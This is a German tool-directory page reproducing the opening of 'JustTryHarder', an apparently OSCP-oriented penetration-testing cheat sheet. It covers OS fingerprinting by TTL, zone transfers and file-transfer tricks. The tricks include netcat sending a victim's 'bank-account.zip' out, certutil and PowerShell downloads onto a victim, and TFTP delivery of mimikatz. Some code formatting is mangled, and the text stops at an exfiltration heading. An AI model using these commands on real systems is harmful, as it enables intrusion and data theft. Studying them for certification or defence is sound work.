Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/sinfulz/justtryharder
Passwort-CrackingPrivilege EscalationAufklärungPayload-GenerierungPort-ScanningExploitationPost-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubsinfulz/justtryharder

JustTryHarder

Umfassender Penetrationstest-Spickzettel zur Vorbereitung auf die PWK/OSCP-Prüfung, der Privilegieneskalation, Passwortknacken, Payload-Erstellung, Post-Exploitation, Port-Scanning, Web-Angriffe und Aufklärungstechniken abdeckt.

Repository anzeigen
836106161vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

JustTryHarder

JustTryHarder ist ein Spickzettel, der dich durch den PWK-Kurs und die OSCP-Prüfung begleiten wird.

(Inspiriert von PayloadAllTheThings)

Du kannst gerne einen Pull-Request einreichen und einen Stern hinterlassen, um etwas Liebe zu zeigen, wenn dir das geholfen hat. 💖

Hacktoberfest-freundlich!

Ja, wir sind offen für Pull-Requests für Hacktoberfest! Bitte stelle sicher, dass es kein Spam ist und tatsächlich einen guten Beitrag zu diesem Repo leistet. Danke & happy hacking!

Haftungsausschluss: Keines der unten aufgeführten Dinge enthält Spoiler für die PWK-Labs / OSCP-Prüfung.

Quellenangabe

Ich habe viele dieser Informationen aus anderen Github-Repos, Blogs, Websites und mehr bezogen. Ich habe versucht, dem ursprünglichen Ersteller so viel Anerkennung wie möglich zu geben. Falls ich dir keine Anerkennung gegeben habe, kontaktiere mich bitte auf Twitter: https://twitter.com/s1nfulz

Inhaltsverzeichnis

  • Bestimmung des Betriebssystems eines Hosts per Ping
  • BOF (WIP)
  • Breakouts / Umgebungsausbrüche
  • DNS - Zonentransfers
  • Dateitransfers
  • Kerberoasting
  • LFI / RFI
  • MSSQL / SQLi
  • Passwortknacken
  • Passwort-Spraying (CrackMapExec)
  • Payload-Generierung
  • PHP
  • Privilegieneskalation - Linux
  • Privilegieneskalation - Windows
  • Post-Exploitation
  • Port-Weiterleitung
  • Socks-Proxy (mit PowerShell)
  • Port-Scanning
  • Ping-Sweep
  • Pivoting
  • Remote Desktop
  • Responder
  • Reverse Shells
  • Shell-Upgrade
  • SQL-Injection (SQLmap)
  • Lauschende Ports anzeigen
  • SMB - Enumeration
  • SMB - Impacket
  • SMTP-Enumeration
  • ICMP-Injection
  • VMware (nicht im Vollbildmodus)
  • Webserver
  • Web-Scanning
  • Web-Shells
  • WordPress
  • Windows-Framework / PowerShell
  • Windows-Post-Exploitation-Befehle
  • Schreibbare Verzeichnisse
  • Aufgabenliste
  • Danksagung

Bestimmung des Betriebssystems eines Hosts per Ping```bash

ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

Der `TTL` kann verwendet werden, um das Betriebssystem des Hosts zu bestimmen. Die drei verschiedenen TTL-Typen sind wie folgt dargestellt:

  - **TTL=64** = \*nix – Der Hop Count; wenn du also 61 erhältst, gibt es 3 Hops und es handelt sich um ein \*nix-Gerät. Höchstwahrscheinlich Linux.
  - **TTL=128** = Windows – Auch hier: Wenn der TTL 127 beträgt, ist der Hop 1 und es ist eine Windows-Box.
  - **TTL=254** = Solaris/AIX – Wenn der TTL 250 beträgt, ist der Hop Count 4 und es ist eine Solaris-Box.

## BOF (WIP)

(Typische schlechte Zeichen sind: `0x00`, `0x0A`, `0x0D`)

  - Fuzzing
  - Finden der EIP-Position
  - Finden schlechter Zeichen
  - Lokalisieren von `jmp esp`
  - Generieren des Payloads mit `msfvenom`
  - Reverse Shell mit `netcat` erhalten

**Gute BOF-Ressourcen:**

  - [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
  - [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
  - [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
  - [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)

## Breakouts / Umgebungsausbrüche

  - [Pentest Partners - Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
  - [SRA.io - SiteKiosk Breakout](https://sra.io/blog/sitekiosk-breakout/)
  - [TrustedSec - Kiosk/POS Breakout Keys](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
  - [Cognosec - Breaking out of Citrix Environment](https://cognosec.com/breaking-out-of-citrix-environment/)
  - [NetSPI - Breaking out of Applications](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
  - [NCC Group - Common Issues with Environment Breakouts (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
  - [GracefulSecurity - Citrix Breakout](https://gracefulsecurity.com/citrix-breakout/)

## DNS - Zonentransfers```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## Dateiübertragungen

### SMB Transfer

Auf dem Opferrechner (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget-Transfer

So rufen Sie Dateien vom Host ab (innerhalb einer Reverse Shell).

**Einrichtung:** Legen Sie die zu übertragende Datei in `/var/www/html/` ab und führen Sie `service apache2 start` aus.

Führen Sie auf dem entfernten Server aus:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64)       # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/)   # <- for folder
```
### TFTP-Übertragung

(Wie man von Kali zu Windows überträgt).

**Verwendung von MSF:**
Starten Sie MSF vor diesen Schritten:

1.  `use auxiliary/server/tftp`
2.  `set TFTPROOT /usr/share/mimikatz/Win32/`
3.  `run`

**In einem Terminal:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`

### NetCat (Windows zu Kali)

1.  **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2.  **Linux:** `nc -nlvp 4444 > bank-account.zip`

### PowerShell

Interaktive Sitzung:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
Ohne eine interaktive PowerShell-Sitzung (Erstelle `wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -> Linux)

**Lokaler Host:**

1.  `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2.  Übertrage `encoded.b64` auf den entfernten Server via `nc` oder anderweitig.

**Entfernter Server - Linux:**
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`

### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### HTTP-Datei-Upload (Exfiltration)
```
Tool herunterladen